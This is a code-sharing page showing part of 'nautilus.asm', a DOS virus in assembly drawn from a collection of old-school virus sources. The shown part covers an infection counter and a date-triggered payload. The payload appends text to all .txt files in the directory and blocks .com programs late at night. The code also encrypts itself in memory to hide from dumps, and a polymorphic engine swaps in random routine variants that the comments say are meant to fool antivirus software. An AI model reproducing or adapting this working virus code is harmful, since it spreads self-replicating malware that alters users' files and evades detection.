nautilus.asm
来自「More than 800 virus code (old school) ju」· 汇编 代码 · 共 1,143 行 · 第 1/3 页
ASM
1,143 行
lea dx,[9Eh] ; Filename in DTA
xor cx,cx ; Clears CX
mov cl,byte ptr [bp+s_attr] ; Puts the attributes into CL
int 21h ; Isn't DOS just sooooo helpful.
cmp byte ptr [bp+Victems],07h ; Check to see if 7 files have been infected.
je BadStuff ; Place where the bomb will be dropped
mov ax,4F00h ; Function 4Fh: Find next
jmp Findnext
Badstuff: ; Here is where the payload goes
; This is a real simple payload
; It will go off on the day that the Abraham Lincoln was rammed by the
; Nautilus submarine in the book 20,000 Leagues Under The Sea.
; It will then print a text string to the end of all text files in the
; current directory, and display a message and no *.com files will run
; from 11pm to midnight because that is around the time of day it happened
; ( in the book at least ), its fiction in case you were wondering
Go_Root: ; Takes us to root
mov ah,3Bh ; Function 3Bh: Change Directory
lea dx,[bp+dot_dot] ; '..' back a directory
int 21h ; Hey DOS, lets go to the ROOT Directory
jnc Go_root ; Loops til we hit the root
; Now We head back to the directory we started in by getting the
; CurDIR variable from its buffer
mov ah,3Bh ; Function 3Bh: Change Directory
lea dx,[bp+CurDIR] ; Saved starting directory
int 21h
jnc DropBomb ; It was successful
jmp Exit ; For whatever reason we were not able to get there
; so we should exit
DropBomb:
mov ah,04h ; Function 04h: Get Real Time Clock ( Date )
int 1Ah ; INT 1Ah BIOS Time interrupt
; Gets the date and puts the value into the following
; registers.
; CH = Century
; CL = Year
; DH = Month
; DL = Day
cmp dx,1106h ; The day that the Nautilus rammed Professor Arronax's ship
je WriteText ; Only activate on this day
jmp Exit ; Otherwise get out of here
WriteText:
mov ah,4Eh ; Function 4Eh: Find First
FindNextText:
lea dx,[bp+textmask] ; Gets the text file mask
mov cx,07h ; all file attributes
int 21h ; Tells DOS to get us the file
jnc OpenText
jmp FindTime
OpenText:
lea si,[95h] ; Start of file attributes
mov cx,09h ; CX is enough to read: Attrib/Time/Date/Size
lea di,[bp+s_attr] ; Place to save all the file attribs
rep movsb ; Moves em to their new home ( to be restore later )
; Set attrib to 0
lea dx,[9Eh] ; Filename in DTA
mov ax,4301h ; Function 4301h: Set File Attributes
xor cx,cx ; Clear file attribs
int 21h ; Calls DOS to do 'our dirty work'
mov ax,3D01h ; Function 3Dh: Open File
; 01h = for write access
mov dx,9Eh ; ASCIZ Filename in DTA
int 21h ; Calls DOS to tear that baby open!
xchg bx,ax ; Puts file handle in BX
mov ax,4202h ; Function 42h: Move File Pointer
; 02 = End Of File (EOF)
xor cx,cx ; 0
xor dx,dx ; 0
int 21h ; Once we get to the end of thew file we can write our
; string to it, without damaging anything
mov ah,40h ; Function 40h: Write to file
lea dx,[bp+line1] ; Puts the string start address into DX
mov cx,Textlen ; Puts the text length into CX
int 21h ; Writes that baby
mov ax,5701h ; Function 5701h: Set File's Last - Written Date and Time
mov dx,word ptr [bp+s_date] ; DX = Date
mov cx,word ptr [bp+s_time] ; CX = Time
int 21h ; More Dirty work for DOS
mov ah,3Eh ; Function 3Eh: Close File
int 21h ; Calls DOS to close up the file.
mov ax,4301h ; Function 4301h: Set File Attributes
lea dx,[9Eh] ; Filename in DTA
xor cx,cx ; Clears CX
mov cl,byte ptr [bp+s_attr] ; Puts the attributes into CL
int 21h ; Isn't DOS just sooooo helpful.
mov ax,4F00h ; Find next
jmp FindNextText ; Gets the next one
FindTime:
mov ah,02h ; Function 02h: Get Real Time Clock ( Time )
int 1Ah ; Retrieves the time and puts the values into the
; following registers
; CH = Hour
; CL = Minutes
; DH = Seconds
; DL = Daylight Savings Flag ( 0h = standard time; 1h = daylight time )
cmp cx,2300h ; 11:00pm ( about the time it was rammed )
jb exit ; If before 11 we are safe, otherwise ...
mov ah,09h ; Function 09h: Print String Standard Output
lea dx,[bp+Message1] ; Location of string
int 21h ; Calls DOS
int 20h ; Close Program
message1 db 'Thus ends the voyage under the seas.','$'
exit:
; Lets set the DTA back to what it should be so that the program can
; can use any parameters passed to it.
lea si,[bp+NewDTA] ; Area that DTA was saved
mov di,80h ; Area where it was
mov cx,2Ah ; Length of DTA
rep movsb ; Put it back
; Now we are gonna get outta here, first we should cover up any stuff
; that might show up in a mem dump, so that if anyone looks, all they
; see is garbage.
HideEnde EQU 2Ah+VirL+Buffer-Ende
lea si,[bp+Ende] ; We are gonna encrypt from Ende to end of DTA
mov di,si ; So it is hidden along with the Virus itself
mov dl,[bp+EncVal2] ; Rotate value
mov dh,[bp+Xor2Val] ; Xor value
mov cx,HideEnde ; Length of buffer area used + DTA area :)
call DCryptie ; Calls 2nd encrypt routine
lea di,[bp+EndRet] ; Loads start of routine that returns control
mov si,di ; to host program, into DI/SI
mov dl,[bp+EncVal1] ; Gets encryption value for DL
mov dh,[bp+Xor1Val] ; Gets XOR value for DH
mov cx,DoneRet-EndRet ; length to encrypt
call Cryptie ; Calls the encryptor. We encrypt this so it is the
; only thing left after the next call. Understand?
lea di,[bp+Virus_Start] ; Gets the location of the Virus_start and hides
; everything but the encryption itself. ( and the
; kitchen sink, of course )
mov si,di ; and put it into DI/SI so we can hide the virus
; from the host program.
mov dl,[bp+DecVal1] ; Rotate value
mov dh,[bp+Xor1Val] ; Xor value
mov cx,Cryptie-Virus_start ; Gives length of area to hide into CX
call cryptie ; Calls the encryption loop to hide it
EndRet: ; Jumps to the start of the actual program.
; But first, lets reset all registers so no
; problems are caused by a program assuming 0
; registers.
xor sp,sp ; resets the stack pointer
push sp ; and pushes 0 onto the stack
xor di,di
xor si,si
;xor cx,cx ; CX is 0 by the call to Cryptie
xor ax,ax
xor bx,bx
xor dx,dx
xor bp,bp
push 100h ; Puts 100h on stack
ret ; Jumps to location on stack ( 100h )
DoneRet:
jumping db 0E9h ; E9 = jmp
jumpto db 0,0 ; Place for the new address
; Dec/Enc values are here for the Morphing aspect, so that
; whatever type of decryption/encryption is used the values will
; always be found here.
Morph: ; This will move different ( preset ) Encryption
; Routines and Calls into their respective spots.
; It will also Change the Delta offset thing, because
; that is a dead giveaway to the virus and is just dying
; to become a scanstring.
; Get New Enc/Dec Values
in al,40h ; Get random number from port 40h
and al,7h ; Masks out all but first 3 bits
jnz NotZero ; If its not zero, we are good.
inc al ; Makes any 0 = 1
NotZero:
mov [bp+EncVal1],al ; Saves it as the EncVal1
neg ax ; gets the opposite of AL
and al,7h ; Makes EncVal1 + DecVal1 = 8
mov [bp+DecVal1],al ; Saves the DecVal1
in al,40h ; Get random number from port 40h
and al,7h ; Masks out all but first 3 bits
jnz NotZero2 ; If its not zero, we are good.
inc al ; Makes any 0 = 1
NotZero2:
mov [bp+EncVal2],al ; Saves it as the EncVal2
neg ax ; gets the opposite of AL
and al,7h ; Makes EncVal2 + DecVal2 = 8
mov [bp+DecVal2],al ; Saves the DecVal2
; Get XorValues
Xoragain:
in al,40h ; Random number from port 40h
xchg bx,ax ; saves it into BL
in al,40h ; Gets another
cmp al,bl ; Makes sure they are not the same
; because they might decrypt each other
; in Cryptie and DCryptie, depending on
; how they turn out.
jz XorAgain ; If they are equal, try again
mov [bp+Xor1Val],al ; Save it as Xor1Val
mov [bp+Xor2Val],bl ; Save it as Xor2Val
; Now, the above got us some values to use, all we have to do, is
; modify how they are used. For the decrypt calls, and routines, we just
; randomly choose from a list of possibles.
xor dx,dx
GetDelta: ; Get a possible Delta Offset Thingy
mov dl,0Ah
lea di,[bp+Virus_Start]
lea si,[bp+PosDelta]
in al,40h ; Gets Random Number
and al,7h ; Makes it 7 or less
imul dl ; Multiplies AL by 0Ah and stores in AX
add si,ax ; Adds AX to SI so we can get one of the possible
; morphs for getting the delta offset.
mov cx,dx ; Length of Delta Offset Morphs
rep movsb ; MORPHING TIME!!
GetCC: ; Get a possible Call Cryptie
mov dl,12h ; Size of Call Cryptie Morphs
lea di,[bp+Decrypt]
lea si,[bp+PosCC]
in al,40h ; Gets Random Number
and al,7h ; Makes it 7 or less
imul dl ; Multiplies AL by 12h and stores in AX
add si,ax ; Adds AX to SI so we can get one of the possible
; morphs for calling Cryptie.
mov cx,dx ; Length of Call Cryptie Morphs
rep movsb ; MORPHING TIME!!
GetCDC: ; Get one of the possible Call DCryptie's
mov dl,12h ; Size of Call DCryptie Morphs
lea di,[bp+Hidden]
lea si,[bp+PosCDC]
in al,40h ; Gets Random Number
and al,7h ; Makes it 7 or less
imul dl ; Multiplies AL by 12h and stores in AX
add si,ax ; Adds AX to SI so we can get one of the possible
; morphs for calling DCryptie.
mov cx,dx ; Length of Call DCryptie Morphs
rep movsb ; MORPHING TIME!!
GetCR: ; Get 2 new encryption routines
mov dx,0Eh ; Size of each possible encryption routine
lea di,[bp+MorphD1] ; Start of first encryption routine to change
lea si,[bp+PosCR] ; Start of possible variants
in al,40h ; Gets a random number
and al,0Fh ; Makes it 0Fh or less
imul dl ; Multiplies 0Eh by the Random # and stores in AX
add si,ax ; Gets the offset of encryption variant and puts
; it into the SI
mov cx,dx ; Gives count of encryption length to CX
rep movsb ; Quickly does the first of two
mov dx,0Eh ; Size of each possible encryption routine
lea di,[bp+MorphD2] ; Start of second encryption routine to change
lea si,[bp+PosCR] ; Start of possible variants
in al,40h ; Gets a random number
and al,0Fh ; Makes it 0Fh or less
imul dl ; Multiplies 0Eh by the Random # and stores in AX
add si,ax ; Gets the offset of encryption variant and puts
; it into the SI
mov cx,dx ; Gives count of encryption length to CX
rep movsb ; Quickly does the second one
ret ; Goes back to the spot that called here
; Below is a Database of possible morphs
; The same results are reached by using any of these morphs
; they are just there to fool AV software companies.
PosDelta: ; Possible Delta Routines, size 10 bytes
db 0E8,00,00 ; 3 ; Call Delta
sti ; 1
pop bp ; 1
xchg bx,ax ; 1
sub bp,offset delta ; 4
; = 10
PosDelta2:
sti ; 1
clc ; 1
db 0E8h,0,0 ; 3
pop ax ; 1
sub ax,offset delta +2 ; 3
xchg bp,ax ; 1
; = 10
PosDelta3:
cli ; 1
db 0E8h,0,0 ; 3
pop ax ; 1
sti ; 1
sub ax,offset delta+1 ; 3
xchg bp,ax ; 1
; = 10
PosDelta4:
cld ; 1
db 0E8h,0,0 ; 3
pop bp ; 1
clc ; 1
sub bp,offset delta+1 ; 4
; = 10
PosDelta5:
db 0E8h,0,0 ; 3
pop bx ; 1
sti ; 1
xchg bx,ax ; 1
sub ax,offset delta ; 3
xchg bp,ax ; 1
; = 10
PosDelta6:
sti ; 1
nop ; 1
db 0E8h,0,0 ; 3
pop bp ; 1
sub bp,offset delta+2 ; 4
; = 10
PosDelta7:
db 0E8h,0,0 ; 3
pop ax ; 1
xchg bx,ax ; 1
xchg bx,ax ; 1
sub ax,offset delta ; 3
xchg bp,ax ; 1
; = 10
PosDelta8:
db 0E8h,0,0 ; 3
nop ; 1
pop ax ; 1
nop ; 1
sub ax,offset delta ; 3
xchg bp,ax ; 1
; = 10
PosCC: ; Possible Call Cryptie, size 12h ( 18d ) bytes
mov cx,cryptie-hidden ; 3
lea si,[bp+hidden] ; 4
nop ; 1
mov di,si ; 2
mov dl,[bp+DecVal1] ; 4
mov dh,[bp+Xor1val] ; 4
; = 18
PosCC2:
lea di,[bp+hidden] ; 4
nop ; 1
mov dl,[bp+DecVal1] ; 4
mov cx,cryptie-hidden ; 3
mov dh,[bp+Xor1val] ; 4
⌨️ 快捷键说明
复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?